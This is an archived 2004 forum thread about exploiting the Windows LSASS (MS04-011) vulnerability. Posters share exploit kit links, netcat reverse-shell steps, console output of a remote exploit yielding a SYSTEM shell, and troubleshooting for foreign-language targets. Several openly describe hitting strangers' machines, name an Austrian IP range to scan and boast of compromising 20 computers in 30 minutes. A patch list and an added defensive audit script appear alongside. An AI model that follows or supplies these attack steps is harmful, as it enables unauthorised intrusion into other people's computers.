Full Version: Lsass Cmd Line
Anyone know of a cmd line LSASS scanner?
Just do a port scan for ports 445 & 139. The fix is still not there on most systems.
Hello. To exploit the LSASS vulnerability, you need: the lsass exploit, nc.exe, sbaanetapi.dll and the scanner DSScan.exe (found for you: http://www.foundstone.com/resources/freetools/dsscan.zip? ). Kit with all you need: http://users.volja.net/exceed/RLsasrv.zip (RLsasrv.exe = Lsass exploit). Next you must listen on a port and run the exploit:
And the shell will appear on the listening port:
Apply this vulnerability on YOUR OWN SYSTEM. Explained by Max. Have fun guys, and sorry for my bad explanations... I am so bad in English... Hello Nikscap
I think he's looking for a cmd line scanner, something that can identify vulnerable machines but can be used from only the command line.
Correct you are, Dag... exactly how my question was worded.
Good ole' Germans (or whatever nationality), and to confirm it, the program he posted is the GUI scanner.
Can you tell me where you got this link??? http://users.volja.net/exceed/RLsasrv.zip??? It is an ISP from my country, so I would like to know...?
Well, it looks good (for us), but it doesn't work for me...
I've found vulnerable IPs (I was in them... nc -l -p 444, I thought he was listening... well). Now I launch the exploit with the target IP, the port, and my IP. It looked like this: rlsasrv.exe (target ip shellcode size 316 and sometimes the line Ret value = 1726, where the ret value seems randomized... but no shell. I've got no firewall, no AV, and the RPC services running (for upload). What have I done wrong? I've tried around 10 times, none worked... all were vulnerable... Do I have to buy a new brain, or throw out that exploit? O_o [Edit] Oops, sorry, I forgot: I've got XP Pro... :] Excuse my English, I'm not from here... but I try to speak the best I can... :]
WWW.GOOGLE.COM
Me too... I've got many IPs but none give shells... also the exploit cmd line gave randomized ret values... like 53, 1352, 1726...
peace peopleZ
Ok so it works (tested often *g*). If you get shellcode size 316 and nothing different (like Ret value e.g.) then it works surely! Just search... a tip: try the range 62.47.*.* (Austria guys)
This works man..
How to protect your LAN against this exploit? It could be used by WORMS!!
Thx man, nice exploit heheh
Well... this is a good exploit, it is beautiful, but some of us don't know how it works, or WHY it doesn't work...
If someone could type an example, something that works, it would be VERY useful, because there are a lot of computers waiting for us... :]
I tested the exploit on my own boxes just to see if the exploit worked well.
On Win 2k nothing happened {isn't patched}; Win XP crashed (Blaster stylez). Serhat
Thanks for the step-by-step guide...
Well I'm actually trying it on my own 100% WINXP LAN, in which there are 10 VULNERABLE IPs.
I also get a "ret value" every time, without any incoming connection on my listening port. The computers are also getting a "system shutdown in 1 min" msg box. I never got a shell. I heard this exploit wasn't working well on XP systems, can anyone confirm that?
I can confirm that it doesn't work on XP without modding.
Well I'd be interested a LOT if a modded exploit .c source was available that would give a shell on WinXP. Even a "non reverse" one.
Is this only something to do with the OS offsets or is it deeper than that, misa?
Heh, thanks for getting off topic
Well, I only want a little explanation:
This exploit only works on an ENGLISH OS, doesn't it? I've tried on French systems, it seems not to work... Am I right when I say it only works on an English OS? I've heard it's a matter of offsets...
Well my LAN is 100% French WinXP and this exploit caused crashes on them, but no shell.
SO I'd say it still "works" a bit on French systems.
Remember DCOM with all those crashes? Think what that was about, then think about this one and you'll figure it out.
For those that can't get this to work at all, have you thought that maybe it's because your ISP is blocking certain ports?
I have been doing a bit of asking around, and it seems that if your ISP blocks those ports like 135 and 139, then you are out of luck, it just won't work for you. Find another way around it........ get a different ISP..... whatever...
My ISP doesn't block these ports... I know this because someone has tried this exploit on me...
LKM... well, in this way, it's a method to force someone to reboot... it would be better with a shell ^^'
Hi all !!
For all those for whom it doesn't work... There is a UNIVERSAL version of this exploit... Here it works PERFECTLY, I've tried, about 20 computers in 30 minutes... Try it, you'll love it!
It's not working for me.
Like the old one... I don't know the problem... but I've tried a lot of IPs without any results...
My ISP blocks 139 and 445 along with some other common ones, all because of that lame ass kid who made the MSBlaster worm(s). Shame!
THX a lot icingtaupe, I will try it and tell you if it worked.
EDIT: IT works PERFECTLY on WINXP SP1 FR, WINXP FR, WIN2K SP4 FR. That's what I tested. Thanks a lot for sharing that.
I updated all patches on my target machines and then tried out this exploit. Nothing happened on any of the machines, whereas I have heard that this is still not patched by MS. Can anybody explain that? We are using Win2000.
Install the MS04-011 patch. It fixes:
LSASS Vulnerability - CAN-2003-0533
LDAP Vulnerability - CAN-2003-0663
PCT Vulnerability - CAN-2003-0719
Winlogon Vulnerability - CAN-2003-0806
Metafile Vulnerability - CAN-2003-0906
Help and Support Center Vulnerability - CAN-2003-0907
Utility Manager Vulnerability - CAN-2003-0908
Windows Management Vulnerability - CAN-2003-0909
Local Descriptor Table Vulnerability - CAN-2003-0910
H.323 Vulnerability* - CAN-2004-0117
Virtual DOS Machine Vulnerability - CAN-2004-0118
Negotiate SSP Vulnerability - CAN-2004-0119
SSL Vulnerability - CAN-2004-0120
ASN.1 "Double Free" Vulnerability - CAN-2004-0123
------------
Security Bulletin: hxxp://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
Win 2000 Patch: hxxp://www.microsoft.com/downloads/details.aspx?FamilyID=0692c27e-f63a-414c-b3eb-d2342fbb6c00&DisplayLang=en
Win XP patch: hxxp://www.microsoft.com/downloads/details.aspx?FamilyID=3549ea9e-da3f-43b9-a4f1-af243b6168f3&DisplayLang=en
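A defender-side companion to the patch list above, added here as an example and not code posted in the thread: run on a Windows host, it reports whether the MS04-011 update is recorded as installed, the version of lsasrv.dll for comparison with the bulletin's file table, and whether the host is listening on TCP 139/445, the ports the thread says the exploit reaches. It assumes KB835732 is the update number Microsoft assigned to MS04-011 and uses only the built-in Get-HotFix and netstat so it also runs on old hosts.

```powershell
# Added example (not from the thread): audit the local Windows host for the
# MS04-011 LSASS fix and for exposure on the ports the exploit uses (139/445).
# Assumption: KB835732 is the update number Microsoft assigned to MS04-011.

function Test-Ms04011Status {
    param([string]$KbId = 'KB835732')

    # Windows 2000/XP/2003 report NT 5.x; later builds never needed this update.
    $legacyOs = [Environment]::OSVersion.Version.Major -eq 5

    # 1. Is the update recorded as installed?
    $hotfix = Get-HotFix -Id $KbId -ErrorAction SilentlyContinue

    # 2. Capture the lsasrv.dll version for comparison with the bulletin's
    #    file information table (the bulletin is the authority, not this script).
    $lsasrv = Join-Path $env:SystemRoot 'System32\lsasrv.dll'
    if (Test-Path $lsasrv) {
        $version = (Get-Item $lsasrv).VersionInfo.FileVersion
    } else {
        $version = 'not found'
    }

    # 3. Which of the two ports are accepting connections? netstat is parsed
    #    instead of Get-NetTCPConnection so the check also runs on old hosts.
    $listening = @()
    foreach ($line in (netstat -an)) {
        if ($line -match '^\s*TCP\s+\S+:(139|445)\s+\S+\s+LISTENING') {
            $listening += [int]$Matches[1]
        }
    }
    $listening = @($listening | Sort-Object -Unique)

    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        LegacyOs       = $legacyOs
        Ms04011Patched = [bool]$hotfix
        LsasrvVersion  = $version
        ListeningPorts = ($listening -join ',')
        # The worm exposure the thread worries about: an NT 5.x host without
        # the update that still answers on 139/445. Block those ports at the
        # perimeter until the update is applied.
        Exposed        = $legacyOs -and (-not $hotfix) -and ($listening.Count -gt 0)
    }
}

Test-Ms04011Status | Format-List
```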
^^
Sweet, excellent. I have been messing with this for about 6 hours; this has the potential to do major damage.
Does that mean no one knows a scanline for the exploit? One that checks if it's vuln/not.
Yes, try DSScan, it's a vuln scanner for this exploit... sorry, no link at the moment but it has been posted on the board, just search.
peaz
Has anybody offsets for German, Spanish etc.?
That ain't a command-line scanner, it's a GUI.
Hm guys, can anyone tell me what I do wrong?
1. I started nc -l -p 4000 in my cmd box.
2. I run the exploit but I only get ret value = 1736 etc. Has anyone a hint for me?
Yes.
Change the version of the exploit ^^" Have you tried with the exploit on page 1, or on page 2? The page 2 one works a bit more than the first... :]
I was able to use the exploit on Win2K eng SP4, but instead of using netcat (ConnectBackIP), I telnet directly to whatever port I use. Fortunately or unfortunately here (depending on which side you're standing on), we use automatic Windows Update, so our workstations should be patched. I tried the lsass exploit on unpatched French Windows XP SP1 and the exploit crashes lsass and in that manner gives an error from NT Authority\system and reboots the computer after 59 sec., just as the MS Blast exploit did. Also I heard that the exploit needs to have a local session open on WinXP to be able to remotely control it, and I could confirm that (lsass crashes when a session is open and the exploit fails when there's no opened local session).
So as soon as multi-language shellcode appears within a new modified exploit, then it will be a complete exploit. Have a nice weekend.
Hello all, nice exploit but I've a problem with nc. I've tested on many IPs... when I run the exploit it's good but not for nc:
If you have an answer it would be great.
Forgot to mention that I used both versions of the lsass exploit code...
The first one; /* from www.cnhonker.com */ and the 2nd one; .::[ houseofdabus ]::. gave me exactly the same result on Windows XP SP1 FR. So the second (2nd) one isn't Universal as indicated in the code...! Still, have a nice weekend.
bullmoosekiller > I'm French too, and it works perfectly on WINXP SP1 FR UNPATCHED
Translation: I tried it many times on a WinXP SP1 unpatched host and the 2nd exploit worked perfectly.
Hello LKM (I'm from Quebec)
Hi LKM (I'm French Canadian). Strange that you can remote control on your side and me not at all. Maybe the 2nd exploit is working here but I can't get a shell whether NC is listening or connecting, or even telnetting to the compromised PC's port. Maybe explain to me your technique or which options you're using with NetCat.
Hello,
In my testing, I've come up with a problem using the newest version of lsass (4/29/04). For some reason, a shell is not generated. Initial walkthrough example
--------------------------------
* C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Detecting remote OS: Windows 5.0
*
*
* C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
------------------------------------------------------------------------------------------
Instead of the remote shell, the command prompt just returned me to the directory where I had executed netcat from. Ciau... digitalk2003
That's exactly what I'm experiencing during my own test and security assessment.
Works well but locked on the drive of the OS.
This 'sploit is working really fine and I am not only locked to the drive with the OS installed.
I still don't understand how to secure it.
Can someone post here the fix or how I do that? Tnx..
Well, this gives me something to do this weekend...
You can secure it the same old way you could secure RPC before the Microsoft patches: just disable RPC in the registry, works better than all MS patches put together.
Hi, can you tell exactly what has to be added to the registry to disable it?
thx